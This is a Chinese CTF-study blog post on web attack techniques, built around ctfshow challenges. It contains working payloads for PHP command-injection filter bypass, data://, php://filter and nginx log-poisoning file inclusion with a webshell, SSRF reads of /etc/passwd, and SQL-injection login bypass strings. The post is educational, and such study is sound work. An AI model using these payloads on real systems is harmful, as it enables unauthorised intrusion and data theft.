<!DOCTYPE html><html lang="en" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Web一点心得 | RngAd33的博客</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><script>var config = {"root":"/","search":{"preload":false,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy"}}</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><script src="//unpkg.com/mermaid@10.5.0/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
 --dark-background: url('/img/bg.jpg');
 --light-background: url('/img/bk.jpg');
 --theme-encrypt-confirm: 'confirm'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.busuanzi'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>Web一点心得</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2024-09-21T15:10:18.357Z" id="date"> 2024-09-21</time></div></span><br><span>Last Update: <div class="control"><time datetime="2024-10-15T09:50:18.236Z" id="updated"> 2024-10-15</time></div></span></div></div><hr><div id="post-content"><p>安全无止境，继续前进吧！</p>
<p>罗德岛的PRTS依赖于强大的网络系统，<br>相应地，网络安全尤为重要，这关乎全岛各项事务的正常运作，<br>希望你能够以身作则，祝你好运。<br>–by Kal’tsit</p>
<p class='item-img' data-src='/./img/121663271_p0.png'><img src="/./img/121663271_p0.png"></p>
<h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><h2 id="源码泄露"><a href="#源码泄露" class="headerlink" title="源码泄露"></a>源码泄露</h2><ol>
<li><p>开发注释未及时删除,按F12可以查看源码获取信息；</p>
</li>
<li><p>有些网页设置了js前台绕过无法按F12，在网址前端添加view-source:或者前往浏览器设置关闭javascript即可绕过；</p>
</li>
<li><p>对于采用PHP语言且缺乏防护的网页，通过以下访问手段可以获取到网页PHP源代码；</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">url/index.phps<br>url/www.zip<br></code></pre></td></tr></table></figure>
</li>
<li><p>版本控制泄露</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">url/.git/index.php<br></code></pre></td></tr></table></figure></li>
</ol>
<h2 id="敏感数据泄露"><a href="#敏感数据泄露" class="headerlink" title="敏感数据泄露"></a>敏感数据泄露</h2><ol>
<li><p>robots后台泄露<br> robots.txt规定了用户能够访问网页的范围，<br> 缺乏防护时，访问robots.txt可以获取到网页关键路径等信息；</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">url/robots.txt<br></code></pre></td></tr></table></figure>
</li>
<li><p>探针泄露<br> 开发完成后，未及时删除的探针可能导致信息泄露；</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">url/tz.php<br></code></pre></td></tr></table></figure>
</li>
<li><p>cookie泄露<br> cookie的本质是一个文档，它会记录用户的访问信息；<br> 如果没有对cookie设置HttpOnly属性，一旦被截获就会造成信息泄露；</p>
</li>
<li><p>数据库恶意下载<br> mdb文件是早期asp + access架构的数据库文件，文件泄露相当于数据库被脱裤了；<br> 与此同时，备份的sql文件也可能会泄露敏感信息；</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">url/db/db.mdb<br>url/backup.sql<br></code></pre></td></tr></table></figure></li>
</ol>
<h1 id="暴力破解"><a href="#暴力破解" class="headerlink" title="暴力破解"></a>暴力破解</h1><p>想要实现网页爆破，你需要认识Burpsuite</p>
<ol>
<li><p>纯数字情形<br> 对于纯数字组合的信息，可以使用Burpsuite设置区间构造字典实施爆破。爆破完成后，通过返回长度可以很容易地确认密码，随后查看响应内容获取信息。</p>
</li>
<li><p>一般情形<br> 如果其中包含了字母、特殊字符，也可以采用上面的方法，但是比较费时间。最好调用自己提前准备好的字典，后面的操作方法同上。</p>
</li>
<li><p>随机数情形<br> 如果要爆破的信息是用随机数种子动态生成的，就不要头铁爆破了（这里用到了伪随机数漏洞，详见下文）。先在本地搭建好PHP环境或Linux环境，然后调用靶场的随机数种子生成随机数，最后传参。</p>
</li>
</ol>
<h1 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h1><p>命令执行，需要严格的过滤。攻击者需要想方设法绕过重重过滤。</p>
<h2 id="敏感词汇过滤"><a href="#敏感词汇过滤" class="headerlink" title="敏感词汇过滤"></a>敏感词汇过滤</h2><ol>
<li>文件名&#x2F;扩展名过滤<br> 使用*或?替换掉部分文件名和扩展名，前者可以替换掉一个字符，后者可以一次替换掉多个字符;<br> 或者在词汇中间插入’’或者\绕过检测；</li>
<li>函数名过滤<br> 当system被过滤时，使用echo <code>command</code>;执行系统命令；<br> 如果echo被过滤，使用nl命令；</li>
<li>拼接法<br> 通过构造与调用参数拼接敏感词汇，也能够绕过检测；</li>
</ol>
<h2 id="敏感字符过滤"><a href="#敏感字符过滤" class="headerlink" title="敏感字符过滤"></a>敏感字符过滤</h2><ol>
<li>分号;过滤<br> 使用%0a代替分号；</li>
<li>空格过滤<br> 在echo没有被过滤的情况下，使用$IFS（echo适用）或${IFS}代替空格；<br> 如果echo被过滤，使用%09代替空格（%09是Tab键的url编码）；<br> 如果$或IFS被过滤，可以获取并调用php环境中与空格等效的标识符；</li>
<li></li>
</ol>
<h2 id="数字、字母过滤"><a href="#数字、字母过滤" class="headerlink" title="数字、字母过滤"></a>数字、字母过滤</h2><p>如果遇到了所有字母和数字都被过滤的极端情况，使用以下几种方法：</p>
<ol>
<li><p>php异或<br> 将系统命令异或处理后传入（需要保证密文和密钥均不包含字母和数字）；</p>
</li>
<li><p>php自增</p>
</li>
<li><p>php取反</p>
</li>
<li><p>php或<br> 与异或相似，操作是差不多的。</p>
</li>
</ol>
<p>脚本地址（by yu22x）：<a target="_blank" rel="noopener" href="https://blog.csdn.net/miuzzx/article/details/109143413?spm=1001.2014.3001.5501">https://blog.csdn.net/miuzzx/article/details/109143413?spm=1001.2014.3001.5501</a></p>
<p>需要注意的是：在Linux系统中，system()函数不支持以上操作！<br>    此外，当$、+、-、^、~、|这些字符被过滤后，以上方法将失效。</p>
<h3 id="举些例子（以下题目来自ctfshow）："><a href="#举些例子（以下题目来自ctfshow）：" class="headerlink" title="举些例子（以下题目来自ctfshow）："></a>举些例子（以下题目来自ctfshow）：</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs bash">&lt;?php<br><br>error_reporting(0);<br><span class="hljs-keyword">if</span>(isset(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;c&#x27;</span>]))&#123;<br>    <span class="hljs-variable">$c</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;c&#x27;</span>];<br>    <span class="hljs-keyword">if</span>(!preg_match(<span class="hljs-string">&quot;/flag/i&quot;</span>, <span class="hljs-variable">$c</span>))&#123;<br>        <span class="hljs-built_in">eval</span>(<span class="hljs-variable">$c</span>);<br>    &#125;<br>    <br>&#125;<span class="hljs-keyword">else</span>&#123;<br>    highlight_file(__FILE__);<br>&#125;<br><br><br>payload:<br>    ?c=system(<span class="hljs-string">&#x27;ls&#x27;</span>);<br>    ?c=system(<span class="hljs-string">&#x27;tac fl*g.php&#x27;</span>);<br></code></pre></td></tr></table></figure>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs bash">&lt;?php<br><br>error_reporting(0);<br><span class="hljs-keyword">if</span>(isset(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;c&#x27;</span>]))&#123;<br>    <span class="hljs-variable">$c</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;c&#x27;</span>];<br>    <span class="hljs-keyword">if</span>(!preg_match(<span class="hljs-string">&quot;/flag|system|php/i&quot;</span>, <span class="hljs-variable">$c</span>))&#123;<br>        <span class="hljs-built_in">eval</span>(<span class="hljs-variable">$c</span>);<br>    &#125;<br>    <br>&#125;<span class="hljs-keyword">else</span>&#123;<br>    highlight_file(__FILE__);<br>&#125;<br><br><br>payload:<br>    ?c=<span class="hljs-built_in">echo</span> `<span class="hljs-built_in">ls</span>`;<br>    ?c=<span class="hljs-built_in">echo</span> `<span class="hljs-built_in">tac</span> fl*g.*`;<br>    ?c=<span class="hljs-built_in">echo</span> `<span class="hljs-built_in">nl</span> fl<span class="hljs-string">&#x27;&#x27;</span>ag.p<span class="hljs-string">&#x27;&#x27;</span>hp`;  // 适用于*被过滤的情况<br><br>拼接法：<br>    ?c=<span class="hljs-variable">$a</span>=sys;<span class="hljs-variable">$b</span>=tem;<span class="hljs-variable">$c</span>=<span class="hljs-variable">$a</span>.<span class="hljs-variable">$b</span>;<span class="hljs-variable">$c</span>(<span class="hljs-string">&#x27;ls&#x27;</span>);<br>    ?c=<span class="hljs-variable">$a</span>=sys;<span class="hljs-variable">$b</span>=tem;<span class="hljs-variable">$c</span>=<span class="hljs-string">&quot;<span class="hljs-variable">$&#123;a&#125;</span><span class="hljs-variable">$&#123;b&#125;</span>&quot;</span>;<span class="hljs-variable">$c</span>(<span class="hljs-string">&#x27;ls&#x27;</span>);<br></code></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs bash">&lt;?php<br><br>error_reporting(0);<br><span class="hljs-keyword">if</span>(isset(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;c&#x27;</span>]))&#123;<br>    <span class="hljs-variable">$c</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;c&#x27;</span>];<br>    <span class="hljs-keyword">if</span>(!preg_match(<span class="hljs-string">&quot;/flag|system|php|cat|sort|shell|\.| |\&#x27;|\`|echo|\;|\(|\:|\&quot;/i&quot;</span>, <span class="hljs-variable">$c</span>))&#123;<br>        <span class="hljs-built_in">eval</span>(<span class="hljs-variable">$c</span>);<br>    &#125;<br>    <br>&#125;<span class="hljs-keyword">else</span>&#123;<br>    highlight_file(__FILE__);<br><br><br>payload:<br>    ?c=include<span class="hljs-variable">$_GET</span>[url]?&gt;&amp;url=php://filter/read=convert.base64-encode/resource=flag.php<br>&#125;<br></code></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs bash">&lt;?php<br><br><span class="hljs-keyword">if</span>(isset(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;c&#x27;</span>]))&#123;<br>    <span class="hljs-variable">$c</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;c&#x27;</span>];<br>    <span class="hljs-keyword">if</span>(!preg_match(<span class="hljs-string">&quot;/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i&quot;</span>, <span class="hljs-variable">$c</span>))&#123;<br>        system(<span class="hljs-variable">$c</span>.<span class="hljs-string">&quot; &gt;/dev/null 2&gt;&amp;1&quot;</span>);<br>    &#125;<br>&#125;<span class="hljs-keyword">else</span>&#123;<br>    highlight_file(__FILE__);<br>&#125;<br><br><br>payload:<br>    ?c=<span class="hljs-built_in">tac</span>&lt;fl<span class="hljs-string">&#x27;&#x27;</span>ag.php||<br>    ?c=ta<span class="hljs-string">&#x27;&#x27;</span>c&lt;fl<span class="hljs-string">&#x27;&#x27;</span>ag.php||  // 适用于<span class="hljs-built_in">tac</span>被过滤的情况<br></code></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs bash">&lt;?php<br><br><br><span class="hljs-keyword">if</span>(isset(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;c&#x27;</span>]))&#123;<br>    <span class="hljs-variable">$c</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;c&#x27;</span>];<br>    <span class="hljs-keyword">if</span>(!preg_match(<span class="hljs-string">&quot;/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&amp;|\*|\（|\）|\-|\=|\+|\&#123;|\[|\]|\&#125;|\:|\&#x27;|\&quot;|\,|\&lt;|\.|\&gt;|\/|\?|\\\\/i&quot;</span>, <span class="hljs-variable">$c</span>))&#123;<br>        <span class="hljs-built_in">eval</span>(<span class="hljs-variable">$c</span>);<br>    &#125;<br>        <br>&#125;<span class="hljs-keyword">else</span>&#123;<br>    highlight_file(__FILE__);<br>&#125;<br><br><br>payload:<br>    ?c=<span class="hljs-built_in">eval</span>(next(reset(get_defined_vars())));&amp;1=system(<span class="hljs-string">&quot;ls&quot;</span>);<br>    ?c=<span class="hljs-built_in">eval</span>(next(reset(get_defined_vars())));&amp;1=system(<span class="hljs-string">&quot;tac%20flag.php&quot;</span>);<br>// get_defined_vars(void)：返回一个包含所有已定义变量列表的多维数组，可以替代任意变量。这些变量包括环境变量、服务器变量和用户定义的变量。 <br>    <br></code></pre></td></tr></table></figure>


<h1 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h1><h2 id="伪随机数漏洞"><a href="#伪随机数漏洞" class="headerlink" title="伪随机数漏洞"></a>伪随机数漏洞</h2><p>有时候，我们需要一定的认证手段防范恶意攻击，比如说使用随机数。但是，在同一个随机数种子下，随机数的序列是相同的。</p>
<h2 id="文件包含漏洞"><a href="#文件包含漏洞" class="headerlink" title="文件包含漏洞"></a>文件包含漏洞</h2><p>使用各类文件包含指令，对目标实施攻击；</p>
<ol>
<li><p>data包含<br> 用于执行一句话木马，查找并获取flag。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash">?file=data://text/plain,&lt;?php system(<span class="hljs-string">&quot;ls&quot;</span>)?&gt;<br>?file=data://text/plain,&lt;?php system(<span class="hljs-string">&quot;ls *.php&quot;</span>)?&gt;  // 仅查找.php文件<br>?file=data://text/plain,&lt;?php system(<span class="hljs-string">&quot;tac flag.php&quot;</span>)?&gt;<br>?file=data://text/plain,&lt;?php system(<span class="hljs-string">&quot;tac fl*g.*&quot;</span>)?&gt;  // 绕过flag，php过滤<br>?file=data://text/plain;<span class="hljs-built_in">base64</span>,PD9waHAgCnN5c3RlbSgidGFjIGZsYWcucGhwIikKPz4=   //绕过system，&lt;?过滤<br></code></pre></td></tr></table></figure>
</li>
<li><p>filter包含<br> 用于获取网页PHP源代码，但在不知道flag在哪时不好用。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">?file=php://filter/read=convert.base64-encode/resource=index.php<br>?file=php://filter/convert.base64-encode/resource=index.php<br></code></pre></td></tr></table></figure>
</li>
<li><p>日志包含<br> nginx默认日志路径。配合burpsuite使用，与data包含功能相似，伟大无需多言。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">?file=/var/log/nginx/access.log<br></code></pre></td></tr></table></figure>
<p>包含后，拦截http请求头，在ua信息末尾插入一句话木马（一般用来传参）后放行。<br>传参后，在日志包含口令后面添加命令执行口令，随后可以找到flag。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">/* 假设已经上传的参数为1 */<br>?file=/var/log/nginx/access.log&amp;1=system(<span class="hljs-string">&#x27;ls *.php&#x27;</span>);<br>?file=/var/log/nginx/access.log&amp;1=system(<span class="hljs-string">&#x27;tac flag.php&#x27;</span>);<br></code></pre></td></tr></table></figure>
</li>
<li><p>session包含</p>
</li>
<li><p>phpinfo_lfi</p>
</li>
</ol>
<h2 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="文件上传漏洞"></a>文件上传漏洞</h2><p>通过在上传的文件中插入一句话木马，在缺乏防护的情况下，可以实现对服务器的命令控制；</p>
<h2 id="XSS跨站脚本漏洞"><a href="#XSS跨站脚本漏洞" class="headerlink" title="XSS跨站脚本漏洞"></a>XSS跨站脚本漏洞</h2><p>过滤验证很重要，但如果只设置javascript前端验证，忽略了后端验证，就会留下跨站脚本漏洞。</p>
<p>比如说，我们要在网页上输入一段信息，javascript验证可以在提交数据之前过滤掉敏感字符，这样主要是为了防止用户输入错误。</p>
<p>然而，绕过javascript验证的思路也非常简单：先提交合法数据，再拦截上传的http(s)请求并将原先输入的合法数据修改为敏感数据，最后上传篡改后的http(s)请求，就能够成功提敏感数据，造成XSS漏洞。</p>
<p>所以，设置服务器端验证是非常重要的攻击防护手段，每一位web开发人员都应当具有这样的意识。</p>
<h2 id="CSRF漏洞"><a href="#CSRF漏洞" class="headerlink" title="CSRF漏洞"></a>CSRF漏洞</h2><p>身份验证漏洞，传说中的钓鱼链接就是这样来的。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">url + /vul/csrf/csrfget/csrf_get_edit.php? + 内容<br></code></pre></td></tr></table></figure>
<p>防护策略:</p>
<ol>
<li>阻止不明外域的访问；</li>
<li>提交时要求附加只有在本域才能获取的信息；</li>
<li>增加token验证（token需要随机生成，值足够大，用后需销毁）；</li>
<li>增加验证码；</li>
</ol>
<h2 id="SSRF漏洞"><a href="#SSRF漏洞" class="headerlink" title="SSRF漏洞"></a>SSRF漏洞</h2><p>如果服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制，黑客可以通过伪造服务端请求对其他服务器实施攻击。<br>一般用于攻击与外界隔离的内部服务器。</p>
<h3 id="利用方式"><a href="#利用方式" class="headerlink" title="利用方式"></a>利用方式</h3><ol>
<li>探测内网信息；</li>
<li>窃取敏感内容；</li>
<li>作为跳板，攻击其他网站或应用；</li>
</ol>
<h3 id="协议利用"><a href="#协议利用" class="headerlink" title="协议利用"></a>协议利用</h3><h4 id="Dict协议"><a href="#Dict协议" class="headerlink" title="Dict协议"></a>Dict协议</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">dict://ip:port<br>dict://ip:port/command<br>eg:<br>dict://fuzz.wuyun.org:8000/helo:dict<br></code></pre></td></tr></table></figure>
<h4 id="Gopher协议"><a href="#Gopher协议" class="headerlink" title="Gopher协议"></a>Gopher协议</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">gopher://ip:port/_TCP/IP数据流<br>eg:<br>gopher://fuzz.wuyun.org:8000/gopher<br></code></pre></td></tr></table></figure>
<h4 id="File协议"><a href="#File协议" class="headerlink" title="File协议"></a>File协议</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">file:///etc/passwd<br></code></pre></td></tr></table></figure>


<h1 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h1><p>细节决定成败，SQL注入玩的就是不严谨的语法。</p>
<h2 id="热身：万能密码绕过"><a href="#热身：万能密码绕过" class="headerlink" title="热身：万能密码绕过"></a>热身：万能密码绕过</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">1<span class="hljs-string">&#x27; or &#x27;</span>1<span class="hljs-string">&#x27;=&#x27;</span>1<br>1<span class="hljs-string">&#x27; or 1=1 or &#x27;</span>1<span class="hljs-string">&#x27;=&#x27;</span>1<br></code></pre></td></tr></table></figure>
<p>原验证登陆语句:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">SELECT * FROM admin WHERE Username= <span class="hljs-string">&#x27;&quot;.$username.&quot;&#x27;</span> AND Password= <span class="hljs-string">&#x27;&quot;.md5($password).&quot;&#x27;</span><br></code></pre></td></tr></table></figure>
<p>注入后的语句：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">SELECT * FROM admin WHERE Username=<span class="hljs-string">&#x27;1&#x27;</span> OR <span class="hljs-string">&#x27;1&#x27;</span>=<span class="hljs-string">&#x27;1&#x27;</span> AND Password=<span class="hljs-string">&#x27;EDFKGMZDFSDFDSFRRQWERRFGGG&#x27;</span><br>SELECT * FROM admin WHERE Username=<span class="hljs-string">&#x27;1&#x27;</span> OR 1=1 OR <span class="hljs-string">&#x27;1&#x27;</span>=<span class="hljs-string">&#x27;1&#x27;</span> AND Password=<span class="hljs-string">&#x27;EDFKGMZDFSDFDSFRRQWERRFGGG&#x27;</span><br></code></pre></td></tr></table></figure>
<p>注入后，不论密码是否正确，1&#x3D;1 or ‘1’&#x3D;’1’永远成立，成功绕过密码环节。</p>
<h2 id="注入类型"><a href="#注入类型" class="headerlink" title="注入类型"></a>注入类型</h2><h3 id="数字型注入"><a href="#数字型注入" class="headerlink" title="数字型注入"></a>数字型注入</h3><p>一般出现在弱类型语言（如ASP、PHP等）中，因为这种语言会自动推导变量类型；<br>而对于强类型语言（如Java、C#等），普通的类型转换会抛出异常而无法继续执行，所以一般不存在数字型注入漏洞。</p>
<h3 id="字符型注入"><a href="#字符型注入" class="headerlink" title="字符型注入"></a>字符型注入</h3><h2 id="注入芝士"><a href="#注入芝士" class="headerlink" title="注入芝士"></a>注入芝士</h2><h3 id="SQL-Server"><a href="#SQL-Server" class="headerlink" title="SQL Server"></a>SQL Server</h3><ol>
<li><p>错误信息收集<br> SQL Server能够准确定位错误信息，黑客可以利用错误信息提取数据。</p>
</li>
<li><p>获取元数据</p>
</li>
<li><p>UNION查询（联合查询）</p>
</li>
<li><p>危险函数</p>
</li>
</ol>
<h3 id="MySQL"><a href="#MySQL" class="headerlink" title="MySQL"></a>MySQL</h3><h1 id=""><a href="#" class="headerlink" title="&lt;- To be continued"></a>&lt;- To be continued</h1><div id="paginator"></div></div><div id="post-footer"><div id="pages" style="justify-content: flex-start"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2024/09/21/Misc%E6%89%93%E6%9D%82%E5%9C%A3%E7%BB%8F/">← Next Misc打杂圣经</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" href="#toc-div" title="To Catalog">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo"></a><h1 id="Dr"><a href="/">RngAd33</a></h1><div id="description"><p></p></div><div id="social-links"><a class="social" href="mailto:yxbsyx@outlook.com"><i class="fa fa-envelope" alt="E-Mail"></i></a><a class="social" target="_blank" rel="noopener" href="https://space.bilibili.com/403699403/favlist?fid=2455564303&amp;ftype=create"><i class="fa-brands fa-bilibili" alt="BiliBili"></i></a></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.</span> <span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BA%90%E7%A0%81%E6%B3%84%E9%9C%B2"><span 